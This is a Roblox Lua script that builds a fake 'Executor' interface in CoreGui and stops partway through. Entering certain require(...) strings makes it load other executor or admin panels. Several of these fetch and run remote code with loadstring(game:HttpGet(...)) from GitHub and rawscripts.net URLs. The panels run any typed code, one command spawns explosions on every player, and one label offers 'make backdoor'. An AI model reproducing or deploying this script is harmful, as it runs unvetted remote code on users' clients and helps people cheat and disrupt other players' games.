local gui = Instance.new("ScreenGui")
gui.Name = "ss"
gui.Parent = game.CoreGui

wait(5)

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0.0, 319, 0.0, 299)
Main.Position = UDim2.new(0.0, 0, 0.0, 0)
Main.BackgroundColor3 = Color3.new(1, 1, 1)
Main.BorderColor3 = Color3.new(0, 0, 0)
Main.BorderSizePixel = 0
Main.Active = true
Main.BackgroundTransparency = 1
Main.Draggable = true
Main.Visible = false
Main.Parent = gui

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = Main

local Topbar = Instance.new("Frame")
Topbar.Size = UDim2.new(0.9, 32, 0.0, 27)
Topbar.Position = UDim2.new(0.0, 0, 0.0, 0)
Topbar.BackgroundColor3 = Color3.new(0, 0, 0)
Topbar.BorderColor3 = Color3.new(0, 0, 0)
Topbar.BorderSizePixel = 0
Topbar.Active = false
Topbar.BackgroundTransparency = 0 
Topbar.Draggable = true
Topbar.Parent = Main

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = Topbar

local White = Instance.new("Frame")
White.Size = UDim2.new(0.9, 32, 0.9, 3)
White.Position = UDim2.new(0.0, 0, 0.0, 0)
White.BackgroundColor3 = Color3.new(1, 1, 1)
White.BorderColor3 = Color3.new(0, 0, 0)
White.BorderSizePixel = 0
White.Active = false
White.BackgroundTransparency = 0.7
White.Draggable = true
White.Parent = Topbar

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = White

local Uio = Instance.new("Frame")
Uio.Size = UDim2.new(0.9, 32, 0.0, 1)
Uio.Position = UDim2.new(0.0, 0, 0.9, 2)
Uio.BackgroundColor3 = Color3.new(1, 1, 1)
Uio.BorderColor3 = Color3.new(0, 0, 0)
Uio.BorderSizePixel = 0
Uio.Active = false
Uio.BackgroundTransparency = 0 
Uio.Draggable = true
Uio.Parent = Topbar

local Scr = Instance.new("ScrollingFrame")
Scr.Size = UDim2.new(0.9, 32, 0.6, 39)
Scr.Position = UDim2.new(0.0, 0, 0.0, 27)
Scr.BackgroundColor3 = Color3.new(1, 1, 1)
Scr.BorderColor3 = Color3.new(0, 0, 0)
Scr.BorderSizePixel = 0
Scr.Parent = Main
Scr.ScrollBarThickness = 0
Scr.CanvasSize = UDim2.new(0.0, 0, 0.0, 0)

Scr.BackgroundTransparency = 1


local TextBox = Instance.new("TextBox")
TextBox.Size = UDim2.new(0.9, 999, 0.9, 999)
TextBox.Position = UDim2.new(0.0, 49, 0.0, 0)
TextBox.BackgroundColor3 = Color3.new(0, 0, 0)
TextBox.BorderColor3 = Color3.new(0, 0, 0)
TextBox.BorderSizePixel = 1
TextBox.Text = 'print("project secret ss code ss by Luna")'
TextBox.TextColor3 = Color3.new(1, 1, 1)
TextBox.BackgroundTransparency = 0.7
TextBox.Font = Enum.Font.SourceSans
TextBox.TextSize = 19
TextBox.Parent = Scr
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top
TextBox.ClearTextOnFocus = false
TextBox.MultiLine = true
TextBox.TextWrapped = true
TextBox.TextEditable = true

local number = Instance.new("Frame")
number.Size = UDim2.new(0.0, 49, 0.9, 999)
number.Position = UDim2.new(0.0, 0, 0.0, 0)
number.BackgroundColor3 = Color3.new(0, 0, 0)
number.BorderColor3 = Color3.new(0, 0, 0)
number.BorderSizePixel = 0
number.Active = false
number.BackgroundTransparency = 0 
number.Draggable = true
number.Parent = Scr

local uii = Instance.new("Frame")
uii.Size = UDim2.new(0.0, 49, 0.9, 999)
uii.Position = UDim2.new(0.0, 0, 0.0, 0)
uii.BackgroundColor3 = Color3.new(1, 1, 1)
uii.BorderColor3 = Color3.new(0, 0, 0)
uii.BorderSizePixel = 0
uii.Active = false
uii.BackgroundTransparency = 0.8
uii.Draggable = true
uii.Parent = number

local number1 = Instance.new("TextLabel")
number1.Size = UDim2.new(0.0, 49, 0.9, 9999)
number1.Position = UDim2.new(0.0, 0, 0.0, 0)
number1.BackgroundColor3 = Color3.new(0, 0, 0)
number1.BorderColor3 = Color3.new(0, 0, 0)
number1.BorderSizePixel = 1
number1.Text = "1"
number1.BackgroundTransparency = 1
number1.TextColor3 = Color3.new(1, 1, 1)
number1.Font = Enum.Font.SourceSans
number1.TextSize = 19
number1.Parent = number
number1.TextYAlignment = Enum.TextYAlignment.Top

TextBox:GetPropertyChangedSignal("Text"):Connect(function()
    local lines = TextBox.Text:split("\n")
    local lineText = ""
    for i = 1, #lines do
        lineText = lineText .. tostring(i) .. "\n"
    end
    number1.Text = lineText

    Scr.CanvasSize = UDim2.new(0, 0, 0, #lines * 20)
end)

local Mop = Instance.new("Frame")
Mop.Size = UDim2.new(0.9, 32, 0.2, -6)
Mop.Position = UDim2.new(0.0, 0, 0.8, 5)
Mop.BackgroundColor3 = Color3.new(0, 0, 0)
Mop.BorderColor3 = Color3.new(0, 0, 0)
Mop.BorderSizePixel = 0
Mop.Active = false
Mop.BackgroundTransparency = 0
Mop.Draggable = true
Mop.Parent = Main

local UICorner = Instance.new("UICorner")
UICorner.CornerRadius = UDim.new(0, 5)
UICorner.Parent = Mop

local iop = Instance.new("Frame")
iop.Size = UDim2.new(0.9, 32, 0.9, 6)
iop.Position = UDim2.new(0.0, 0, 0.0, 0)
iop.BackgroundColor3 = Color3.new(1, 1, 1)
iop.BorderColor3 = Color3.new(0, 0, 0)
iop.BorderSizePixel = 0
iop.Active = false
iop.BackgroundTransparency = 0.7
iop.Draggable = true
iop.Parent = Mop

local ooop = Instance.new("UICorner")
ooop.CornerRadius = UDim.new(0, 5)
ooop.Parent = iop

local Tett = Instance.new("TextLabel")
Tett.Size = UDim2.new(0.2, 19, 0.9, 2)
Tett.Position = UDim2.new(0.0, 0, 0.0, 0)
Tett.BackgroundColor3 = Color3.new(0, 0, 0)
Tett.BorderColor3 = Color3.new(0, 0, 0)
Tett.BorderSizePixel = 0
Tett.Text = "Executor"
Tett.BackgroundTransparency = 1
Tett.TextColor3 = Color3.new(255, 255, 255)
Tett.TextSize = 13
Tett.Parent = Topbar

local Exe = Instance.new("TextButton")
Exe.Size = UDim2.new(0.3, 0, 0.7, 0)
Exe.Position = UDim2.new(0.0, 9, 0.0, 9)
Exe.BackgroundColor3 = Color3.new(0, 0, 0)
Exe.BorderColor3 = Color3.new(0, 0, 0)
Exe.BorderSizePixel = 0
Exe.Text = "Execute"
Exe.BackgroundTransparency = 0.8
Exe.TextColor3 = Color3.new(255, 255, 255)
Exe.TextSize = 19
Exe.Parent = Mop
Exe.MouseButton1Click:Connect(function()
local player = game.Players.LocalPlayer
local TextBox = TextBox.Text
    if TextBox == 'require(10868847330):pls("'..game.Players.LocalPlayer.Name..'")' then
loadstring(game:HttpGet("https://raw.githubusercontent.com/gitluau/luauexser/refs/heads/main/pHzp8uG1PO962o6qucrlP3AJy17eV3B.lua"))()
end

if TextBox == 'require(12350030542).RC7("'..game.Players.LocalPlayer.Name..'")' then
local Topbar = Instance.new("Frame")
Topbar.Size = UDim2.new(0.0, 330, 0.0, 29)
Topbar.Position = UDim2.new(0.5, -2, 0.0, -26)
Topbar.BackgroundColor3 = Color3.new(1, 1, 1)
Topbar.BorderColor3 = Color3.new(0, 0, 0)
Topbar.BorderSizePixel = 0
Topbar.Active = true
Topbar.BackgroundTransparency = 1
Topbar.Draggable = true
Topbar.Parent = gui

local Top = Instance.new("ImageLabel")
Top.Size = UDim2.new(0.9, 34, 0.9, 4)
Top.Position = UDim2.new(0.0, 0, 0.0, 0)
Top.BackgroundColor3 = Color3.new(0, 0, 0)
Top.ImageColor3 = Color3.new(1, 1, 1)
Top.Image = "rbxassetid://129165460566731"
Top.ImageTransparency = 0
Top.Parent = Topbar

Top.BackgroundTransparency = 1

local Ui = Instance.new("Frame")
Ui.Size = UDim2.new(0.9, 34, 0.9, 266)
Ui.Position = UDim2.new(0.0, 0, 0.9, 5)
Ui.BackgroundColor3 = Color3.new(1, 1, 1)
Ui.BorderColor3 = Color3.new(0, 0, 0)
Ui.BorderSizePixel = 0
Ui.Active = false
Ui.BackgroundTransparency = 1
Ui.Draggable = true
Ui.Parent = Topbar

local Ui1 = Instance.new("ImageLabel")
Ui1.Size = UDim2.new(0.8, 16, 0.9, 30)
Ui1.Position = UDim2.new(0.0, -1, 0.0, -1)
Ui1.BackgroundColor3 = Color3.new(0, 0, 0)
Ui1.ImageColor3 = Color3.new(1, 1, 1)
Ui1.Image = "rbxassetid://103220137001093"
Ui1.ImageTransparency = 0
Ui1.Parent = Ui

Ui1.BackgroundTransparency = 1

local Rc7 = Instance.new("ImageLabel")
Rc7.Size = UDim2.new(0.0, 53, 0.9, 30)
Rc7.Position = UDim2.new(0.7, 47, 0.0, -1)
Rc7.BackgroundColor3 = Color3.new(0, 0, 0)
Rc7.ImageColor3 = Color3.new(1, 1, 1)
Rc7.Image = "rbxassetid://71877621493624"
Rc7.ImageTransparency = 0
Rc7.Parent = Ui

Rc7.BackgroundTransparency = 1

local Executor = Instance.new("ImageLabel")
Executor.Size = UDim2.new(0.8, 42, 0.9, 14)
Executor.Position = UDim2.new(0.0, 11, 0.0, 11)
Executor.BackgroundColor3 = Color3.new(0, 0, 0)
Executor.ImageColor3 = Color3.new(1, 1, 1)
Executor.Image = "rbxassetid://89070648306751"
Executor.ImageTransparency = 0
Executor.Parent = Ui1
Executor.Visible = false

Executor.BackgroundTransparency = 1

local Hub = Instance.new("ImageLabel")
Hub.Size = UDim2.new(0.3, 19, 0.5, 52)
Hub.Position = UDim2.new(0.0, 9, 0.3, 0)
Hub.BackgroundColor3 = Color3.new(0, 0, 0)
Hub.ImageColor3 = Color3.new(1, 1, 1)
Hub.Image = "rbxassetid://89182833001329"
Hub.ImageTransparency = 0
Hub.Parent = Rc7
Hub.Visible = false

Hub.BackgroundTransparency = 1

local Submit = Instance.new("TextButton")
Submit.Size = UDim2.new(0.3, 9, 0.0, 21)
Submit.Position = UDim2.new(0.0, 95, 0.5, 6)
Submit.BackgroundColor3 = Color3.new(0, 0, 0)
Submit.BorderColor3 = Color3.new(0, 0, 0)
Submit.BorderSizePixel = 0
Submit.Text = ""
Submit.BackgroundTransparency = 1
Submit.TextColor3 = Color3.new(255, 255, 255)
Submit.Font = Enum.Font.Code
Submit.Parent = Ui1
Submit.MouseButton1Click:Connect(function()
wait(1)
Submit.Visible = false
Hub.Visible = true
Executor.Visible = true
end)

local Ro = Instance.new("TextButton")
Ro.Size = UDim2.new(0.9, 2, 0.2, -10)
Ro.Position = UDim2.new(0.0, 0, 0.7, -4)
Ro.BackgroundColor3 = Color3.new(0, 0, 0)
Ro.BorderColor3 = Color3.new(0, 0, 0)
Ro.BorderSizePixel = 0
Ro.Text = ""
Ro.BackgroundTransparency = 1 
Ro.TextColor3 = Color3.new(255, 255, 255)
Ro.Font = Enum.Font.Code
Ro.Parent = Hub
Ro.MouseButton1Click:Connect(function()
loadstring(game:GetObjects("rbxassetid://364364477")[1].Source)()
end)

local x = Instance.new("TextButton")
x.Size = UDim2.new(0.1, 0, 0.9, 5)
x.Position = UDim2.new(0.9, 0, 0.0, 0)
x.BackgroundColor3 = Color3.new(0, 0, 0)
x.BorderColor3 = Color3.new(0, 0, 0)
x.BorderSizePixel = 0
x.Text = ""
x.BackgroundTransparency = 1
x.TextColor3 = Color3.new(255, 255, 255)
x.Font = Enum.Font.Code
x.Parent = Topbar
x.MouseButton1Click:Connect(function()
Topbar:Remove()
end)

local TextBox = Instance.new("TextBox")
TextBox.Size = UDim2.new(0.5, 105, 0.5, 52)
TextBox.Position = UDim2.new(0.0, 26, 0.0, 0)
TextBox.BackgroundColor3 = Color3.new(0, 0, 0)
TextBox.BorderColor3 = Color3.new(0, 0, 0)
TextBox.BorderSizePixel = 0
TextBox.Text = ""
TextBox.TextColor3 = Color3.new(0, 0, 0)
TextBox.BackgroundTransparency = 1
TextBox.Font = Enum.Font.Code
TextBox.TextSize = 15
TextBox.Parent = Executor
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top
TextBox.ClearTextOnFocus = false
TextBox.MultiLine = true
TextBox.TextWrapped = true
TextBox.TextEditable = true

local Exe = Instance.new("TextButton")
Exe.Size = UDim2.new(0.3, 9, 0.0, 26)
Exe.Position = UDim2.new(0.0, 89, 0.6, 39)
Exe.BackgroundColor3 = Color3.new(0, 0, 0)
Exe.BorderColor3 = Color3.new(0, 0, 0)
Exe.BorderSizePixel = 0
Exe.Text = ""
Exe.BackgroundTransparency = 1
Exe.TextColor3 = Color3.new(255, 255, 255)
Exe.Font = Enum.Font.Code
Exe.Parent = Executor
Exe.MouseButton1Click:Connect(function()
assert(loadstring(TextBox.Text))()
end)

local Clea = Instance.new("TextButton")
Clea.Size = UDim2.new(0.3, 14, 0.0, 26)
Clea.Position = UDim2.new(0.5, 42, 0.6, 39)
Clea.BackgroundColor3 = Color3.new(0, 0, 0)
Clea.BorderColor3 = Color3.new(0, 0, 0)
Clea.BorderSizePixel = 0
Clea.Text = ""
Clea.BackgroundTransparency = 1
Clea.TextColor3 = Color3.new(255, 255, 255)
Clea.Font = Enum.Font.Code
Clea.Parent = Executor
Clea.MouseButton1Click:Connect(function()
TextBox.Text = " "
end)
end

if TextBox == 'require(1296392639169).Fire("'..game.Players.LocalPlayer.Name..'")' then
local Ui = Instance.new("Frame")
Ui.Size = UDim2.new(0.0, 372, 0.0, 150)
Ui.Position = UDim2.new(0.2, 34, 0.2, 19)
Ui.BackgroundColor3 = Color3.new(0, 0, 0)
Ui.BorderColor3 = Color3.new(1, 1, 1)
Ui.BorderSizePixel = 4
Ui.Active = true
Ui.BackgroundTransparency = 0.6
Ui.Draggable = true
Ui.Parent = gui
Ui.Visible = true

local Scr = Instance.new("ScrollingFrame")
Scr.Size = UDim2.new(0.9, 37, 0.5, 35)
Scr.Position = UDim2.new(0.0, 0, 0.3,- 4)
Scr.BackgroundColor3 = Color3.new(0, 0, 0)
Scr.BorderColor3 = Color3.new(0, 0, 0)
Scr.BorderSizePixel = 0
Scr.Parent = Ui

Scr.BackgroundTransparency = 1

local Text = Instance.new("TextLabel")
Text.Size = UDim2.new(0.3, 0, 0.1, 2)
Text.Position = UDim2.new(0.3, 20, 0.0, 0)
Text.BackgroundColor3 = Color3.new(0, 0, 0)
Text.BorderColor3 = Color3.new(0, 0, 0)
Text.BorderSizePixel = 1
Text.Text = "Commands"
Text.BackgroundTransparency = 1
Text.TextColor3 = Color3.new(255, 255, 255)
Text.Font = Enum.Font.SourceSansSemibold
Text.TextSize = 15
Text.Parent = Ui

local UiStroke = Instance.new("UIStroke")
UiStroke.Color = Color3.new(0, 0, 0)
UiStroke.Thickness = 0.4
UiStroke.Parent = Text

local Sit = Instance.new("TextLabel")
Sit.Size = UDim2.new(0.9, 0, 0.0, 19)
Sit.Position = UDim2.new(0.0, 0, 0.0, 9)
Sit.BackgroundColor3 = Color3.new(0, 0, 0)
Sit.BorderColor3 = Color3.new(0, 0, 0)
Sit.BorderSizePixel = 1
Sit.Text = "Name: kick me | Rank : 0 Non-Admin | AKA: kick me"
Sit.BackgroundTransparency = 1
Sit.TextColor3 = Color3.new(255, 255, 255)
Sit.Font = Enum.Font.SourceSansSemibold
Sit.Parent = Scr
Sit.TextSize = 16
Sit.TextXAlignment = Enum.TextXAlignment.Left

local Comm = Instance.new("TextLabel")
Comm.Size = UDim2.new(0.9, 0, 0.0, 19)
Comm.Position = UDim2.new(0.0, 0, 0.0, -5)
Comm.BackgroundColor3 = Color3.new(0, 0, 0)
Comm.BorderColor3 = Color3.new(0, 0, 0)
Comm.BorderSizePixel = 1
Comm.Text = "Name: kill me | Rank : 0 Non-Admin | AKA: kill me"
Comm.BackgroundTransparency = 1
Comm.TextColor3 = Color3.new(255, 255, 255)
Comm.Font = Enum.Font.SourceSansSemibold
Comm.Parent = Scr
Comm.TextSize = 14
Comm.TextXAlignment = Enum.TextXAlignment.Left

local duck = Instance.new("TextLabel")
duck.Size = UDim2.new(0.9, 0, 0.0, 19)
duck.Position = UDim2.new(0.0, 0, 0.0, 25)
duck.BackgroundColor3 = Color3.new(0, 0, 0)
duck.BorderColor3 = Color3.new(0, 0, 0)
duck.BorderSizePixel = 0
duck.Text = "Name: duck me | Rank : 0 Non-Admin | AKA: duck me"
duck.BackgroundTransparency = 1
duck.TextColor3 = Color3.new(255, 255, 255)
duck.Font = Enum.Font.SourceSansSemibold
duck.Parent = Scr
duck.TextSize = 14
duck.TextXAlignment = Enum.TextXAlignment.Left

local Text1 = Instance.new("UIStroke")
Text1.Color = Color3.new(0, 0, 0)
Text1.Thickness = 0.4
Text1.Parent = Comm

local sitop = Instance.new("TextLabel")
sitop.Size = UDim2.new(0.9, 0, 0.0, 19)
sitop.Position = UDim2.new(0.0, 0, 0.0, 39)
sitop.BackgroundColor3 = Color3.new(0, 0, 0)
sitop.BorderColor3 = Color3.new(0, 0, 0)
sitop.BorderSizePixel = 0
sitop.Text = "Name: sit me | Rank : 0 Non-Admin | AKA: sit me"
sitop.BackgroundTransparency = 1
sitop.TextColor3 = Color3.new(255, 255, 255)
sitop.Font = Enum.Font.SourceSansSemibold
sitop.Parent = Scr
sitop.TextSize = 14
sitop.TextXAlignment = Enum.TextXAlignment.Left

local exlode = Instance.new("TextLabel")
exlode.Size = UDim2.new(0.9, 0, 0.0, 19)
exlode.Position = UDim2.new(0.0, 0, 0.0, 53)
exlode.BackgroundColor3 = Color3.new(0, 0, 0)
exlode.BorderColor3 = Color3.new(0, 0, 0)
exlode.BorderSizePixel = 0
exlode.Text = "Name: boom me | Rank : 0 Non-Admin | AKA: boom me"
exlode.BackgroundTransparency = 1
exlode.TextColor3 = Color3.new(255, 255, 255)
exlode.Font = Enum.Font.SourceSansSemibold
exlode.Parent = Scr
exlode.TextSize = 14
exlode.TextXAlignment = Enum.TextXAlignment.Left

local X = Instance.new("TextButton")
X.Size = UDim2.new(0.1, 0, 0.1, 5)
X.Position = UDim2.new(0.8, 38, 0.0,- 2)
X.BackgroundColor3 = Color3.new(0, 0, 0)
X.BorderColor3 = Color3.new(0, 0, 0)
X.BorderSizePixel = 0
X.Text = "X"
X.BackgroundTransparency = 1
X.TextColor3 = Color3.new(1, 0, 0)
X.Font = Enum.Font.SourceSansSemibold
X.Parent = Ui
X.TextSize = 30
X.MouseButton1Click:Connect(function()
Ui.Visible = false
end)

local command = Instance.new("TextBox")

local back = Instance.new("ImageButton")

local Rc = Instance.new("Frame")

local mr = Instance.new("ImageButton")
mr.Size = UDim2.new(0.0, 75, 0.0, 74)
mr.Position = UDim2.new(0.8, 50, 0.6, 29)
mr.BackgroundColor3 = Color3.new(0, 0, 0)
mr.ImageColor3 = Color3.new(1, 1, 1)
mr.Image = "rbxassetid://123852508876370"
mr.ImageTransparency = 0
mr.Parent = gui
mr.Visible = true
mr.MouseButton1Click:Connect(function()
mr.Visible = false
back.Visible = true
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
wait(0.001)
back.Rotation = back.Rotation - 9
Rc.Visible = true
end)

mr.BackgroundTransparency = 1

back.Size = UDim2.new(0.0, 95, 0.0, 64)
back.Position = UDim2.new(0.8, 46, 0.6, 33)
back.BackgroundColor3 = Color3.new(0, 0, 0)
back.ImageColor3 = Color3.new(1, 1, 1)
back.Image = "rbxassetid://138720776388826"
back.ImageTransparency = 0
back.Parent = gui
back.Visible = false
back.Rotation = 90
back.MouseButton1Click:Connect(function()
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
wait(0.001)
back.Rotation = back.Rotation + 9
Rc.Visible = false
back.Visible = false
back.Rotation = 90
mr.Visible = true
end)

back.BackgroundTransparency = 1

Rc.Size = UDim2.new(0.9, 139, 0.0, 75)
Rc.Position = UDim2.new(0.0, -229, 0.0, 0)
Rc.BackgroundColor3 = Color3.new(1, 1, 1)
Rc.BorderColor3 = Color3.new(0, 0, 0)
Rc.BorderSizePixel = 3
Rc.Active = false
Rc.BackgroundTransparency = 0.9
Rc.Draggable = true
Rc.Visible = false
Rc.Parent = back

local backo = Instance.new("Frame")
backo.Size = UDim2.new(0.9, 12, 0.9, -2)
backo.Position = UDim2.new(0.0, 5, 0.0, 5)
backo.BackgroundColor3 = Color3.new(0, 0, 0)
backo.BorderColor3 = Color3.new(0, 0, 0)
backo.BorderSizePixel = 0
backo.Active =  false
backo.BackgroundTransparency = 0.3
backo.Draggable = true
backo.Parent = Rc

local white = Instance.new("Frame")
white.Size = UDim2.new(0.9, 21, 0.9, 7)
white.Position = UDim2.new(0.0, 0, 0.0, 0)
white.BackgroundColor3 = Color3.new(1, 1, 1)
white.BorderColor3 = Color3.new(0, 0, 0)
white.BorderSizePixel = 0
white.Active = false
white.BackgroundTransparency = 0.8
white.Draggable = true
white.Parent = backo

local info = Instance.new("TextLabel")
info.Size = UDim2.new(0.9, 21, 0.9, 7)
info.Position = UDim2.new(0.0, 0, 0.0, 0)
info.BackgroundColor3 = Color3.new(0, 0, 0)
info.BorderColor3 = Color3.new(0, 0, 0)
info.BorderSizePixel = 0
info.Text = "Mr Bean admin made by team secret thanks for use my script :)"
info.BackgroundTransparency = 1
info.TextColor3 = Color3.new(0, 1, 0)
info.TextSize = 14
info.Parent = Rc
info.TextWrapped = true

local LPlayer = game.Players.LocalPlayer

LPlayer.Chatted:Connect(function(cht)
if cht:match(";cmds") then
Ui.Visible = true
end

local player = game.Players.LocalPlayer
if game.Players.LocalPlayer.Character then
local pchar = game.Players.LocalPlayer.Character

if cht:match(";kill me") then
game.Players.LocalPlayer.Character.Humanoid.Health = 0
end

if cht:match(";kick me") then
player:Kick("Mr bean admin has kick you...")
end

if cht:match(";duck me") then
local duck = Instance.new("SpecialMesh", pchar.Torso)
duck.MeshType = "FileMesh"
duck.MeshId = "http://www.roblox.com/asset/?id=9419831"
duck.TextureId = "http://www.roblox.com/asset/?id=9419827"
duck.Scale = Vector3.new(5, 5, 5)
pchar.Head.Transparency = 1
pchar["Left Arm"].Transparency = 1
pchar["Right Arm"].Transparency = 1
pchar["Left Leg"].Transparency = 1
pchar ["Right Leg"].Transparency = 1
end

if cht:match(";sit me") then
game.Players.LocalPlayer.Character.Humanoid.Sit = true
end

if cht:match(";boom me") then
for i,v in pairs(game.Players:GetChildren()) do
bomb = Instance.new("Explosion")
			bomb.Parent = v.Character.Torso
			bomb.Position = v.Character.Torso.Position
			bomb.BlastPressure = 10
			bomb.BlastRadius = 10
end
end
end
end)
end

if TextBox == 'require(7192763922).load("'..game.Players.LocalPlayer.Name..'")' then
local Ui = Instance.new("Frame")
Ui.Size = UDim2.new(0.0, 524, 0.0, 350)
Ui.Position = UDim2.new(0.2, 4, 0.0, -45)
Ui.BackgroundColor3 = Color3.new(1, 1, 1)
Ui.BorderColor3 = Color3.new(0, 0, 0)
Ui.BorderSizePixel = 9
Ui.Active = true
Ui.BackgroundTransparency = 0 
Ui.Draggable = true
Ui.Parent = gui

local White = Instance.new("Frame")
White.Size = UDim2.new(0.9, 52, 0.9, 36)
White.Position = UDim2.new(0.0, 0, 0.0, 0)
White.BackgroundColor3 = Color3.new(1, 1, 1)
White.BorderColor3 = Color3.new(1, 1, 1)
White.BorderSizePixel = 9
White.Active = false
White.BackgroundTransparency = 0.8
White.Draggable = true
White.Parent = Ui

local Main = Instance.new("ImageLabel")
Main.Size = UDim2.new(0.9, 52, 0.9, 36)
Main.Position = UDim2.new(0.0, 0, 0.0, 0)
Main.BackgroundColor3 = Color3.new(0, 0, 0)
Main.ImageColor3 = Color3.new(1, 1, 1)
Main.Image = "rbxassetid://130216881113545"
Main.ImageTransparency = 0
Main.Parent = Ui

Main.BackgroundTransparency = 1

local X = Instance.new("TextButton")
X.Size = UDim2.new(0.0, 77, 0.0, 49)
X.Position = UDim2.new(0.9, -25, 0.0, 0)
X.BackgroundColor3 = Color3.new(0, 0, 0)
X.BorderColor3 = Color3.new(0, 0, 0)
X.BorderSizePixel = 0
X.Text = ""
X.BackgroundTransparency = 1
X.TextColor3 = Color3.new(255, 255, 255)
X.Font = Enum.Font.Code
X.Parent = Ui
X.MouseButton1Click:Connect(function()
Ui:Remove()
end)
end
if TextBox == 'require(4874364435)("'..game.Players.LocalPlayer.Name..'")' then
loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Idk-script-2-28418"))()
end

if TextBox == 'require(18665717275).load("'..game.Players.LocalPlayer.Name..'")' then
loadstring(game:HttpGet("https://raw.githubusercontent.com/Icalock/Server/refs/heads/main/Grab%20V4.txt", true))()
end

if TextBox == 'require(10027382472)("'..game.Players.LocalPlayer.Name..'")' then
local pro = Instance.new("Frame")
pro.Size = UDim2.new(0.0, 595, 0.0, 409)
pro.Position = UDim2.new(0.0, 1, 0.0, -2)
pro.BackgroundColor3 = Color3.new(1, 1, 1)
pro.BorderColor3 = Color3.new(0, 0, 0)
pro.BorderSizePixel = 1
pro.Active = true
pro.BackgroundTransparency = 0
pro.Draggable = true
pro.Parent = gui

local namepro = Instance.new("TextLabel")
namepro.Size = UDim2.new(0.9, 60, 0.0, 19)
namepro.Position = UDim2.new(0.0, 0, 0.0, 0)
namepro.BackgroundColor3 = Color3.new(1, 1, 1)
namepro.BorderColor3 = Color3.new(0, 0, 0)
namepro.BorderSizePixel = 1
namepro.Text = "Project ligma"
namepro.BackgroundTransparency = 0
namepro.TextColor3 = Color3.new(0, 0, 0)
namepro.Font = Enum.Font.SourceSans
namepro.TextSize = 19
namepro.Parent = pro

local TextBox = Instance.new("TextBox")
TextBox.Size = UDim2.new(0.5, 102, 0.9, -39)
TextBox.Position = UDim2.new(0.0, 34, 0.0, 34)
TextBox.BackgroundColor3 = Color3.new(1, 1, 1)
TextBox.BorderColor3 = Color3.new(0, 0, 0)
TextBox.BorderSizePixel = 1
TextBox.Text = ""
TextBox.PlaceholderText = "Script here"
TextBox.PlaceholderColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextColor3 = Color3.new(0, 0, 0)
TextBox.BackgroundTransparency = 0
TextBox.Font = Enum.Font.SourceSans
TextBox.TextSize = 14
TextBox.Parent = pro
TextBox.TextXAlignment = Enum.TextXAlignment.Left
TextBox.TextYAlignment = Enum.TextYAlignment.Top
TextBox.ClearTextOnFocus = false
TextBox.MultiLine = true
TextBox.TextWrapped = true
TextBox.TextEditable = true

local Exe = Instance.new("TextButton")
Exe.Size = UDim2.new(0.0, 53, 0.5, -27)
Exe.Position = UDim2.new(0.8, -24, 0.0, 20)
Exe.BackgroundColor3 = Color3.new(1, 1, 1)
Exe.BorderColor3 = Color3.new(0, 0, 0)
Exe.BorderSizePixel = 1
Exe.Text = "Exe"
Exe.BackgroundTransparency = 0 
Exe.TextColor3 = Color3.new(0, 0, 0)
Exe.Font = Enum.Font.SourceSans
Exe.TextSize = 21
Exe.Parent = pro
Exe.MouseButton1Click:Connect(function()
assert(loadstring(TextBox.Text))()
end)

local clea = Instance.new("TextButton")
clea.Size = UDim2.new(0.0, 53, 0.5, 5)
clea.Position = UDim2.new(0.8, -24, 0.0, 199)
clea.BackgroundColor3 = Color3.new(1, 1, 1)
clea.BorderColor3 = Color3.new(0, 0, 0)
clea.BorderSizePixel = 1
clea.Text = "Clea"
clea.BackgroundTransparency = 0 
clea.TextColor3 = Color3.new(0, 0, 0)
clea.Font = Enum.Font.SourceSans
clea.TextSize = 21
clea.Parent = pro
clea.MouseButton1Click:Connect(function()
TextBox.Text = ""
end)

local priva = Instance.new("TextLabel")
priva.Size = UDim2.new(0.0, 89, 0.0, 20)
priva.Position = UDim2.new(0.8, 30, 0.0, 20)
priva.BackgroundColor3 = Color3.new(1, 1, 1)
priva.BorderColor3 = Color3.new(0, 0, 0)
priva.BorderSizePixel = 1
priva.Text = "private hax"
priva.BackgroundTransparency = 0 
priva.TextColor3 = Color3.new(0, 0, 0)
priva.Font = Enum.Font.SourceSans
priva.TextSize = 13
priva.Parent = pro

local game = Instance.new("TextLabel")
game.Size = UDim2.new(0.0, 89, 0.0, 20)
game.Position = UDim2.new(0.8, 30, 0.0, 41)
game.BackgroundColor3 = Color3.new(1, 1, 1)
game.BorderColor3 = Color3.new(0, 0, 0)
game.BorderSizePixel = 1
game.Text = "game cursor gui"
game.BackgroundTransparency = 0 
game.TextColor3 = Color3.new(0, 0, 0)
game.Font = Enum.Font.SourceSans
game.TextSize = 13
game.Parent = pro

local back = Instance.new("TextLabel")
back.Size = UDim2.new(0.0, 89, 0.0, 20)
back.Position = UDim2.new(0.8, 30, 0.0, 62)
back.BackgroundColor3 = Color3.new(1, 1, 1)
back.BorderColor3 = Color3.new(0, 0, 0)
back.BorderSizePixel = 1
back.Text = "make backdoor"
back.BackgroundTransparency = 0 
back.TextColor3 = Color3.new(0, 0, 0)
back.Font = Enum.Font.SourceSans
back.TextSize = 13
back.Parent = pro

local c00 = Instance.new("TextLabel")
c00.Size = UDim2.new(0.0, 89, 0.0, 20)
